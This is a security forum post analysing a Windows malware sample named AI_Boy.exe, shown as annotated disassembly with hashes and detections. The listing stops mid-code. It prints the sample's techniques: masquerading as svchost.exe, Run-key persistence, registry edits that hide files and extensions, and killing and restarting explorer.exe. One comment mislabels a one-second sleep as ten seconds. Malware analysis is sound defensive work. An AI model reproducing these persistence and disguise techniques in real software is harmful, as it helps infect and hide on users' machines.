好友
阅读权限40
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 豪斯登堡新郎 于 2009-6-22 08:33 编辑
文件: Programs AI_Boy.exe
大小: 254021 字节
MD5: AD4A82D68F7831B1FC960D3F1021D11E
SHA1: 3428ADD6219D30891E5441EC27200FE4430258DD
CRC32: 98B01919
开发语言:Microsoft Visual C++ 6.0
卡巴斯基:N/A
瑞星:N/A
金山毒霸:Heur.Win32.Generic_01.h
只做非常简单的行为分析 疏漏之处还请见谅
1.创建互斥体004010A0 > \55 push ebp
004010A1 . 8BEC mov ebp, esp
004010A3 . 81EC 08050000 sub esp, 508
004010A9 . 53 push ebx
004010AA . 56 push esi
004010AB . 57 push edi
004010AC . 8DBD F8FAFFFF lea edi, dword ptr [ebp-508]
004010B2 . B9 42010000 mov ecx, 142
004010B7 . B8 CCCCCCCC mov eax, CCCCCCCC
004010BC . F3:AB rep stos dword ptr es:[edi]
004010BE . 8BF4 mov esi, esp
004010C0 . 68 78E14200 push 0042E178 ; /MutexName = "TEST_VIRUS_ONE"
004010C5 . 6A 00 push 0 ; |InitialOwner = FALSE
004010C7 . 6A 00 push 0 ; |pSecurity = NULL
004010C9 . FF15 B0834300 call dword ptr [<&KERNEL32.CreateMute>; \创建一个名为"TEST_VIRUS_ONE"的互斥体
004040B0 >/$ 55 push ebp
004040B1 |. 8BEC mov ebp, esp
004040B3 |. 6A FF push -1
004040B5 |. 68 A8E84200 push 0042E8A8
004040BA |. 68 D0634000 push 004063D0 ;
004040BF |. 64:A1 0000000>mov eax, dword ptr fs:[0]
004040C5 |. 50 push eax
004040C6 |. 64:8925 00000>mov dword ptr fs:[0], esp
004040CD |. 83C4 A4 add esp, -5C
004040D0 |. 53 push ebx
004040D1 |. 56 push esi
004040D2 |. 57 push edi
004040D3 |. 8965 E8 mov dword ptr [ebp-18], esp
004040D6 |. FF15 5C844300 call dword ptr [<&KERNEL32.GetVersion>; 获取系统信息
00401B47 |. 51 push ecx ; /pLocalId
00401B48 |. 68 A8E14200 push 0042E1A8 ; |Privilege = "SeDebugPrivilege"
00401B4D |. 6A 00 push 0 ; |SystemName = NULL
00401B4F |. FF15 74834300 call dword ptr [<&ADVAPI32.LookupPriv>; 为进程提升SeDebugPrivilege权限
004010CF . 3BF4 cmp esi, esp
004010D1 . E8 EA2A0000 call 00403BC0
004010D6 . 8BF4 mov esi, esp
004010D8 . FF15 E0834300 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004010DE . 3BF4 cmp esi, esp
004010E0 . E8 DB2A0000 call 00403BC0
004010E5 . 3D B7000000 cmp eax, 0B7
004010EA . 0F85 9F000000 jnz 0040118F
004010F0 . 8BF4 mov esi, esp
004010F2 . 68 04010000 push 104 ; /BufSize = 104 (260.)
004010F7 . 68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004010FC . 6A 00 push 0 ; |hModule = NULL
004010FE . FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401104 . 3BF4 cmp esi, esp
00401106 . E8 B52A0000 call 00403BC0
0040110B . 68 EC5D4300 push 00435DEC
00401110 . E8 2B2A0000 call 00403B40
00401115 . 83C4 04 add esp, 4
00401118 . 83E8 68 sub eax, 68
0040111B . 50 push eax
0040111C . 68 EC5D4300 push 00435DEC
00401121 . 68 E85C4300 push 00435CE8
00401126 . E8 15290000 call 00403A40
0040112B . 83C4 0C add esp, 0C
0040112E . 68 EC5D4300 push 00435DEC
00401133 . E8 082A0000 call 00403B40
00401138 . 83C4 04 add esp, 4
0040113B . C680 805C4300>mov byte ptr [eax+435C80], 0
00401142 . 8BF4 mov esi, esp
00401144 . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401149 . 68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
0040114E . 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; |
00401154 . 50 push eax ; |s
00401155 . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040115B . 83C4 0C add esp, 0C
0040115E . 3BF4 cmp esi, esp
00401160 . E8 5B2A0000 call 00403BC0
00401165 . 8BF4 mov esi, esp
00401167 . 6A 01 push 1 ; /IsShown = 1
00401169 . 6A 00 push 0 ; |DefDir = NULL
0040116B . 6A 00 push 0 ; |Parameters = NULL
0040116D . 8D8D FCFEFFFF lea ecx, dword ptr [ebp-104] ; |
00401173 . 51 push ecx ; |FileName
00401174 . 68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401179 . 6A 00 push 0 ; |hWnd = NULL
0040117B . FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \运行
00401181 . 3BF4 cmp esi, esp
00401183 . E8 382A0000 call 00403BC0
00401188 . 33C0 xor eax, eax
0040118A . E9 34040000 jmp 004015C3
0040118F > 8BF4 mov esi, esp
00401191 . 6A 00 push 0 ; /hTemplateFile = NULL
00401193 . 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401195 . 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401197 . 6A 00 push 0 ; |pSecurity = NULL
00401199 . 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040119B . 68 00000080 push 80000000 ; |Access = GENERIC_READ
004011A0 . 68 301A4300 push 00431A30 ; |FileName = "C:\WINDOWS\svchost.exe"
004011A5 . FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \创建文件C:\WINDOWS\svchost.exe
004011AB . 3BF4 cmp esi, esp
004011AD . E8 0E2A0000 call 00403BC0
004011B2 . 83F8 FF cmp eax, -1
004011B5 . 0F85 04020000 jnz 004013BF
004011BB . 8BF4 mov esi, esp
004011BD . 68 04010000 push 104 ; /BufSize = 104 (260.)
004011C2 . 68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004011C7 . 6A 00 push 0 ; |hModule = NULL
004011C9 . FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004011CF . 3BF4 cmp esi, esp
004011D1 . E8 EA290000 call 00403BC0
004011D6 . 68 EC5D4300 push 00435DEC
004011DB . E8 60290000 call 00403B40
004011E0 . 83C4 04 add esp, 4
004011E3 . 83E8 68 sub eax, 68
004011E6 . 50 push eax
004011E7 . 68 EC5D4300 push 00435DEC
004011EC . 68 E85C4300 push 00435CE8
004011F1 . E8 4A280000 call 00403A40
004011F6 . 83C4 0C add esp, 0C
004011F9 . 68 EC5D4300 push 00435DEC
004011FE . E8 3D290000 call 00403B40
00401203 . 83C4 04 add esp, 4
00401206 . C680 805C4300>mov byte ptr [eax+435C80], 0
0040120D . 8BF4 mov esi, esp
0040120F . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401214 . 68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
00401219 . 8D95 F4FCFFFF lea edx, dword ptr [ebp-30C] ; |
0040121F . 52 push edx ; |s
00401220 . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401226 . 83C4 0C add esp, 0C
00401229 . 3BF4 cmp esi, esp
0040122B . E8 90290000 call 00403BC0
00401230 . 8BF4 mov esi, esp
00401232 . 6A 01 push 1 ; /IsShown = 1
00401234 . 6A 00 push 0 ; |DefDir = NULL
00401236 . 6A 00 push 0 ; |Parameters = NULL
00401238 . 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C] ; |
0040123E . 50 push eax ; |FileName
0040123F . 68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401244 . 6A 00 push 0 ; |hWnd = NULL
00401246 . FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040124C . 3BF4 cmp esi, esp
0040124E . E8 6D290000 call 00403BC0
00401253 . 8BF4 mov esi, esp
00401255 . 6A 00 push 0 ; /hTemplateFile = NULL
00401257 . 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401259 . 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040125B . 6A 00 push 0 ; |pSecurity = NULL
0040125D . 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040125F . 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401264 . 68 CCE04200 push 0042E0CC ; |FileName = "C:\Windows\zhoutun.txt"
00401269 . FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \创建文件C:\Windows\zhoutun.txt
0040126F . 3BF4 cmp esi, esp
00401271 . E8 4A290000 call 00403BC0
00401276 . 83F8 FF cmp eax, -1
00401279 . 74 07 je short 00401282
0040127B . 33C0 xor eax, eax
0040127D . E9 41030000 jmp 004015C3
00401282 > 8BF4 mov esi, esp
00401284 . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401289 . 68 38E04200 push 0042E038 ; |Format = "%s.exe AI_Boy....\\Recycle.exe"
0040128E . 8D8D F8FDFFFF lea ecx, dword ptr [ebp-208] ; |
00401294 . 51 push ecx ; |s
00401295 . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040129B . 83C4 0C add esp, 0C
0040129E . 3BF4 cmp esi, esp
004012A0 . E8 1B290000 call 00403BC0
004012A5 . 8BF4 mov esi, esp
004012A7 . 6A 00 push 0 ; /FailIfExists = FALSE
004012A9 . 68 301A4300 push 00431A30 ; |NewFileName = "C:\WINDOWS\svchost.exe"
004012AE . 68 EC5D4300 push 00435DEC ; |ExistingFileName = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs AI_Boy.exe"
004012B3 . FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; \将自身复制到C:\WINDOWS\svchost.exe
004012B9 . 3BF4 cmp esi, esp
004012BB . E8 00290000 call 00403BC0
004012C0 . 8BF4 mov esi, esp
004012C2 . 6A 00 push 0 ; /FailIfExists = FALSE
004012C4 . 68 341B4300 push 00431B34 ; |NewFileName = "C:\WINDOWS\system\svchost.exe"
004012C9 . 8D95 F8FDFFFF lea edx, dword ptr [ebp-208] ; |
004012CF . 52 push edx ; |ExistingFileName
004012D0 . FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; 将自身复制到C:\WINDOWS\system\svchost.exe
004012D6 . 3BF4 cmp esi, esp
004012D8 . E8 E3280000 call 00403BC0
004012DD . C785 B0FCFFFF>mov dword ptr [ebp-350], 44
004012E7 . B9 10000000 mov ecx, 10
004012EC . 33C0 xor eax, eax
004012EE . 8DBD B4FCFFFF lea edi, dword ptr [ebp-34C]
004012F4 . F3:AB rep stos dword ptr es:[edi]
004012F6 . C785 DCFCFFFF>mov dword ptr [ebp-324], 40
00401300 . 8BF4 mov esi, esp
00401302 . 8D85 A0FCFFFF lea eax, dword ptr [ebp-360]
00401308 . 50 push eax ; /pProcessInfo
00401309 . 8D8D B0FCFFFF lea ecx, dword ptr [ebp-350] ; |
0040130F . 51 push ecx ; |pStartupInfo
00401310 . 6A 00 push 0 ; |CurrentDir = NULL
00401312 . 6A 00 push 0 ; |pEnvironment = NULL
00401314 . 6A 00 push 0 ; |CreationFlags = 0
00401316 . 6A 00 push 0 ; |InheritHandles = FALSE
00401318 . 6A 00 push 0 ; |pThreadSecurity = NULL
0040131A . 6A 00 push 0 ; |pProcessSecurity = NULL
0040131C . 68 341B4300 push 00431B34 ; |CommandLine = "C:\WINDOWS\system\svchost.exe"
00401321 . 6A 00 push 0 ; |ModuleFileName = NULL
00401323 . FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \创建进程
00401329 . 3BF4 cmp esi, esp
0040132B . E8 90280000 call 00403BC0
00401330 . 8BF4 mov esi, esp
00401332 . 8B95 A4FCFFFF mov edx, dword ptr [ebp-35C]
00401338 . 52 push edx ; /hObject
00401339 . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040133F . 3BF4 cmp esi, esp
00401341 . E8 7A280000 call 00403BC0
00401346 . 8BF4 mov esi, esp
00401348 . 8B85 A0FCFFFF mov eax, dword ptr [ebp-360]
0040134E . 50 push eax ; /hObject
0040134F . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401355 . 3BF4 cmp esi, esp
00401357 . E8 64280000 call 00403BC0
0040135C . 8BF4 mov esi, esp
0040135E . 8D8D A0FCFFFF lea ecx, dword ptr [ebp-360]
00401364 . 51 push ecx ; /pProcessInfo
00401365 . 8D95 B0FCFFFF lea edx, dword ptr [ebp-350] ; |
0040136B . 52 push edx ; |pStartupInfo
0040136C . 6A 00 push 0 ; |CurrentDir = NULL
0040136E . 6A 00 push 0 ; |pEnvironment = NULL
00401370 . 6A 00 push 0 ; |CreationFlags = 0
00401372 . 6A 00 push 0 ; |InheritHandles = FALSE
00401374 . 6A 00 push 0 ; |pThreadSecurity = NULL
00401376 . 6A 00 push 0 ; |pProcessSecurity = NULL
00401378 . 68 301A4300 push 00431A30 ; |CommandLine = "C:\WINDOWS\svchost.exe"
0040137D . 6A 00 push 0 ; |ModuleFileName = NULL
0040137F . FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; 创建进程,运行C:\WINDOWS\svchost.exe
00401385 . 3BF4 cmp esi, esp ;
00401387 . E8 34280000 call 00403BC0
0040138C . 8BF4 mov esi, esp
0040138E . 8B85 A4FCFFFF mov eax, dword ptr [ebp-35C]
00401394 . 50 push eax ; /hObject
00401395 . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040139B . 3BF4 cmp esi, esp
0040139D . E8 1E280000 call 00403BC0
004013A2 . 8BF4 mov esi, esp
004013A4 . 8B8D A0FCFFFF mov ecx, dword ptr [ebp-360]
004013AA . 51 push ecx ; /hObject
004013AB . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004013B1 . 3BF4 cmp esi, esp
004013B3 . E8 08280000 call 00403BC0
004013B8 . 33C0 xor eax, eax
004013BA . E9 04020000 jmp 004015C3
004013BF > 8BF4 mov esi, esp
004013C1 . 68 04010000 push 104 ; /BufSize = 104 (260.)
004013C6 . 68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004013CB . 6A 00 push 0 ; |hModule = NULL
004013CD . FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004013D3 . 3BF4 cmp esi, esp
004013D5 . E8 E6270000 call 00403BC0
004013DA . 68 301A4300 push 00431A30 ; ASCII "C:\WINDOWS\svchost.exe"
004013DF . 68 EC5D4300 push 00435DEC
004013E4 . E8 17460100 call 00415A00
004013E9 . 83C4 08 add esp, 8
004013EC . 85C0 test eax, eax
004013EE . 0F84 84000000 je 00401478
004013F4 . 68 EC5D4300 push 00435DEC
004013F9 . E8 42270000 call 00403B40
004013FE . 83C4 04 add esp, 4
00401401 . 83E8 68 sub eax, 68
00401404 . 50 push eax
00401405 . 68 EC5D4300 push 00435DEC
0040140A . 68 E85C4300 push 00435CE8
0040140F . E8 2C260000 call 00403A40
00401414 . 83C4 0C add esp, 0C
00401417 . 68 EC5D4300 push 00435DEC
0040141C . E8 1F270000 call 00403B40
00401421 . 83C4 04 add esp, 4
00401424 . C680 805C4300>mov byte ptr [eax+435C80], 0
0040142B . 8BF4 mov esi, esp
0040142D . 68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator",D7,"烂鎈Programs"
00401432 . 68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
00401437 . 8D95 9CFBFFFF lea edx, dword ptr [ebp-464] ; |
0040143D . 52 push edx ; |s
0040143E . FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401444 . 83C4 0C add esp, 0C
00401447 . 3BF4 cmp esi, esp
00401449 . E8 72270000 call 00403BC0
0040144E . 8BF4 mov esi, esp
00401450 . 6A 01 push 1 ; /IsShown = 1
00401452 . 6A 00 push 0 ; |DefDir = NULL
00401454 . 6A 00 push 0 ; |Parameters = NULL
00401456 . 8D85 9CFBFFFF lea eax, dword ptr [ebp-464] ; |
0040145C . 50 push eax ; |FileName
0040145D . 68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401462 . 6A 00 push 0 ; |hWnd = NULL
00401464 . FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040146A . 3BF4 cmp esi, esp
0040146C . E8 4F270000 call 00403BC0
00401471 . 33C0 xor eax, eax
00401473 . E9 4B010000 jmp 004015C3
00401478 > E8 BAFBFFFF call 00401037
0040147D . 8BF4 mov esi, esp
0040147F . 8D8D 98FBFFFF lea ecx, dword ptr [ebp-468]
00401485 . 51 push ecx ; /pThreadId
00401486 . 6A 00 push 0 ; |CreationFlags = 0
00401488 . 6A 00 push 0 ; |pThreadParm = NULL
0040148A . 68 2D104000 push 0040102D ; |ThreadFunction = Programs.0040102D
0040148F . 6A 00 push 0 ; |StackSize = 0
00401491 . 6A 00 push 0 ; |pSecurity = NULL
00401493 . FF15 24844300 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00401499 . 3BF4 cmp esi, esp
0040149B . E8 20270000 call 00403BC0
004014A0 . 8985 94FBFFFF mov dword ptr [ebp-46C], eax
004014A6 . 8BF4 mov esi, esp
004014A8 . 8B95 94FBFFFF mov edx, dword ptr [ebp-46C]
004014AE . 52 push edx ; /hObject
004014AF . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004014B5 . 3BF4 cmp esi, esp
004014B7 . E8 04270000 call 00403BC0
004014BC . C785 90FBFFFF>mov dword ptr [ebp-470], 0
004014C6 > B8 01000000 mov eax, 1
004014CB . 85C0 test eax, eax
004014CD . 0F84 EE000000 je 004015C1
004014D3 . E8 37FBFFFF call 0040100F
004014D8 . E8 55FBFFFF call 00401032
004014DD . E8 37FBFFFF call 00401019
004014E2 . 83BD 90FBFFFF>cmp dword ptr [ebp-470], 0
004014E9 . 0F85 B9000000 jnz 004015A8
004014EF . 68 1CE04200 push 0042E01C ; ASCII "c:\WINDOWS\explorer.exe"
004014F4 . E8 2FFBFFFF call 00401028
004014F9 . 83C4 04 add esp, 4
004014FC . 8985 8CFBFFFF mov dword ptr [ebp-474], eax
00401502 . 8BF4 mov esi, esp
00401504 . 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
00401506 . 8B8D 8CFBFFFF mov ecx, dword ptr [ebp-474] ; |
0040150C . 51 push ecx ; |hProcess
0040150D . FF15 28844300 call dword ptr [<&KERNEL32.TerminateP>; \遍历explorer.exe
00401513 . 3BF4 cmp esi, esp
00401515 . E8 A6260000 call 00403BC0
0040151A . C785 48FBFFFF>mov dword ptr [ebp-4B8], 44
00401524 . B9 10000000 mov ecx, 10
00401529 . 33C0 xor eax, eax
0040152B . 8DBD 4CFBFFFF lea edi, dword ptr [ebp-4B4]
00401531 . F3:AB rep stos dword ptr es:[edi]
00401533 . C785 74FBFFFF>mov dword ptr [ebp-48C], 40
0040153D . 8BF4 mov esi, esp
0040153F . 8D95 38FBFFFF lea edx, dword ptr [ebp-4C8]
00401545 . 52 push edx ; /pProcessInfo
00401546 . 8D85 48FBFFFF lea eax, dword ptr [ebp-4B8] ; |
0040154C . 50 push eax ; |pStartupInfo
0040154D . 6A 00 push 0 ; |CurrentDir = NULL
0040154F . 6A 00 push 0 ; |pEnvironment = NULL
00401551 . 6A 00 push 0 ; |CreationFlags = 0
00401553 . 6A 00 push 0 ; |InheritHandles = FALSE
00401555 . 6A 00 push 0 ; |pThreadSecurity = NULL
00401557 . 6A 00 push 0 ; |pProcessSecurity = NULL
00401559 . 68 1CE04200 push 0042E01C ; |CommandLine = "c:\WINDOWS\explorer.exe"
0040155E . 6A 00 push 0 ; |ModuleFileName = NULL
00401560 . FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \遍历explorer.exe
00401566 . 3BF4 cmp esi, esp
00401568 . E8 53260000 call 00403BC0
0040156D . 8BF4 mov esi, esp
0040156F . 8B8D 38FBFFFF mov ecx, dword ptr [ebp-4C8]
00401575 . 51 push ecx ; /hObject
00401576 . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040157C . 3BF4 cmp esi, esp
0040157E . E8 3D260000 call 00403BC0
00401583 . 8BF4 mov esi, esp
00401585 . 8B95 3CFBFFFF mov edx, dword ptr [ebp-4C4]
0040158B . 52 push edx ; /hObject
0040158C . FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401592 . 3BF4 cmp esi, esp
00401594 . E8 27260000 call 00403BC0
00401599 . 8B85 90FBFFFF mov eax, dword ptr [ebp-470]
0040159F . 83C0 01 add eax, 1
004015A2 . 8985 90FBFFFF mov dword ptr [ebp-470], eax
004015A8 > 8BF4 mov esi, esp
004015AA . 68 E8030000 push 3E8 ; /Timeout = 1000. ms
004015AF . FF15 30844300 call dword ptr [<&KERNEL32.Sleep>] ; \等待10秒
00401BD0 /> \55 push ebp
00401BD1 |. 8BEC mov ebp, esp
00401BD3 |. 81EC 7C020000 sub esp, 27C
00401BD9 |. 53 push ebx
00401BDA |. 56 push esi
00401BDB |. 57 push edi
00401BDC |. 8DBD 84FDFFFF lea edi, dword ptr [ebp-27C]
00401BE2 |. B9 9F000000 mov ecx, 9F
00401BE7 |. B8 CCCCCCCC mov eax, CCCCCCCC
00401BEC |. F3:AB rep stos dword ptr es:[edi]
00401BEE |. A1 8CE34200 mov eax, dword ptr [42E38C]
00401BF3 |. 8945 F0 mov dword ptr [ebp-10], eax
00401BF6 |. 8B0D 90E34200 mov ecx, dword ptr [42E390]
00401BFC |. 894D F4 mov dword ptr [ebp-C], ecx
00401BFF |. 66:8B15 94E34>mov dx, word ptr [42E394]
00401C06 |. 66:8955 F8 mov word ptr [ebp-8], dx
00401C0A |. A0 96E34200 mov al, byte ptr [42E396]
00401C0F |. 8845 FA mov byte ptr [ebp-6], al
00401C12 |. C745 EC 28E34>mov dword ptr [ebp-14], 0042E328 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
00401C19 |. 8BF4 mov esi, esp
00401C1B |. 8D4D FC lea ecx, dword ptr [ebp-4]
00401C1E |. 51 push ecx ; /pHandle
00401C1F |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C24 |. 6A 00 push 0 ; |Reserved = 0
00401C26 |. 8B55 EC mov edx, dword ptr [ebp-14] ; |
00401C29 |. 52 push edx ; |Subkey
00401C2A |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C2F |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C35 |. 3BF4 cmp esi, esp
00401C37 |. E8 841F0000 call 00403BC0
00401C3C |. 8BF4 mov esi, esp
00401C3E |. 6A 0B push 0B ; /BufSize = B (11.)
00401C40 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; |
00401C43 |. 50 push eax ; |Buffer
00401C44 |. 6A 01 push 1 ; |ValueType = REG_SZ
00401C46 |. 6A 00 push 0 ; |Reserved = 0
00401C48 |. 68 18E34200 push 0042E318 ; |ValueName = "CheckedValue"
00401C4D |. 8B4D FC mov ecx, dword ptr [ebp-4] ; |
00401C50 |. 51 push ecx ; |hKey
00401C51 |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue: 0x00000001
00401C57 |. 3BF4 cmp esi, esp
00401C59 |. E8 621F0000 call 00403BC0
00401C5E |. 8BF4 mov esi, esp
00401C60 |. 8B55 FC mov edx, dword ptr [ebp-4]
00401C63 |. 52 push edx ; /hKey
00401C64 |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C6A |. 3BF4 cmp esi, esp
00401C6C |. E8 4F1F0000 call 00403BC0
00401C71 |. C745 E4 01000>mov dword ptr [ebp-1C], 1
00401C78 |. C745 E0 B8E24>mov dword ptr [ebp-20], 0042E2B8 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt"
00401C7F |. 8BF4 mov esi, esp
00401C81 |. 8D45 E8 lea eax, dword ptr [ebp-18]
00401C84 |. 50 push eax ; /pHandle
00401C85 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C8A |. 6A 00 push 0 ; |Reserved = 0
00401C8C |. 8B4D E0 mov ecx, dword ptr [ebp-20] ; |
00401C8F |. 51 push ecx ; |Subkey
00401C90 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C95 |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C9B |. 3BF4 cmp esi, esp
00401C9D |. E8 1E1F0000 call 00403BC0
00401CA2 |. 8BF4 mov esi, esp
00401CA4 |. 6A 04 push 4 ; /BufSize = 4
00401CA6 |. 8D55 E4 lea edx, dword ptr [ebp-1C] ; |
00401CA9 |. 52 push edx ; |Buffer
00401CAA |. 6A 04 push 4 ; |ValueType = REG_DWORD
00401CAC |. 6A 00 push 0 ; |Reserved = 0
00401CAE |. 68 A4E24200 push 0042E2A4 ; |ValueName = "UnCheckedValue"
00401CB3 |. 8B45 E8 mov eax, dword ptr [ebp-18] ; |
00401CB6 |. 50 push eax ; |hKey
00401CB7 |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt破坏显示文件后缀功能
00401CBD |. 3BF4 cmp esi, esp
00401CBF |. E8 FC1E0000 call 00403BC0
00401CC4 |. 8BF4 mov esi, esp
00401CC6 |. 8B4D E8 mov ecx, dword ptr [ebp-18]
00401CC9 |. 51 push ecx ; /hKey
00401CCA |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401CD0 |. 3BF4 cmp esi, esp
00401CD2 |. E8 E91E0000 call 00403BC0
00401CD7 |. B9 05000000 mov ecx, 5
00401CDC |. BE 88E24200 mov esi, 0042E288 ; ASCII "C:\windows\svchost.exe"
00401CE1 |. 8DBD D8FEFFFF lea edi, dword ptr [ebp-128]
00401CE7 |. F3:A5 rep movs dword ptr es:[edi], dword p>
00401CE9 |. 66:A5 movs word ptr es:[edi], word ptr [esi>
00401CEB |. A4 movs byte ptr es:[edi], byte ptr [esi>
00401CEC |. B9 3B000000 mov ecx, 3B
00401CF1 |. 33C0 xor eax, eax
00401CF3 |. 8DBD EFFEFFFF lea edi, dword ptr [ebp-111]
00401CF9 |. F3:AB rep stos dword ptr es:[edi]
00401CFB |. AA stos byte ptr es:[edi]
00401CFC |. B9 07000000 mov ecx, 7
00401D01 |. BE 64E24200 mov esi, 0042E264 ; ASCII "C:\windows\system\svchost.exe"
00401D06 |. 8DBD D4FDFFFF lea edi, dword ptr [ebp-22C]
00401D0C |. F3:A5 rep movs dword ptr es:[edi], dword p>
00401D0E |. 66:A5 movs word ptr es:[edi], word ptr [esi>
00401D10 |. B9 39000000 mov ecx, 39
00401D15 |. 33C0 xor eax, eax
00401D17 |. 8DBD F2FDFFFF lea edi, dword ptr [ebp-20E]
00401D1D |. F3:AB rep stos dword ptr es:[edi]
00401D1F |. 66:AB stos word ptr es:[edi]
00401D21 |. C785 D0FDFFFF>mov dword ptr [ebp-230], 0042E22C ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00401D2B |. 8BF4 mov esi, esp
00401D2D |. 8D55 DC lea edx, dword ptr [ebp-24]
00401D30 |. 52 push edx ; /pHandle
00401D31 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401D36 |. 6A 00 push 0 ; |Reserved = 0
00401D38 |. 8B85 D0FDFFFF mov eax, dword ptr [ebp-230] ; |
00401D3E |. 50 push eax ; |Subkey
00401D3F |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401D44 |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401D4A |. 3BF4 cmp esi, esp
00401D4C |. E8 6F1E0000 call 00403BC0
00401D51 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
00401D57 |. 51 push ecx
00401D58 |. E8 E31D0000 call 00403B40
00401D5D |. 83C4 04 add esp, 4
00401D60 |. 8BF4 mov esi, esp
00401D62 |. 50 push eax ; /BufSize
00401D63 |. 8D95 D8FEFFFF lea edx, dword ptr [ebp-128] ; |
00401D69 |. 52 push edx ; |Buffer
00401D6A |. 6A 01 push 1 ; |ValueType = REG_SZ
00401D6C |. 6A 00 push 0 ; |Reserved = 0
00401D6E |. 68 1CE24200 push 0042E21C ; |ValueName = "svchost1.exe"
00401D73 |. 8B45 DC mov eax, dword ptr [ebp-24] ; |
00401D76 |. 50 push eax ; |hKey
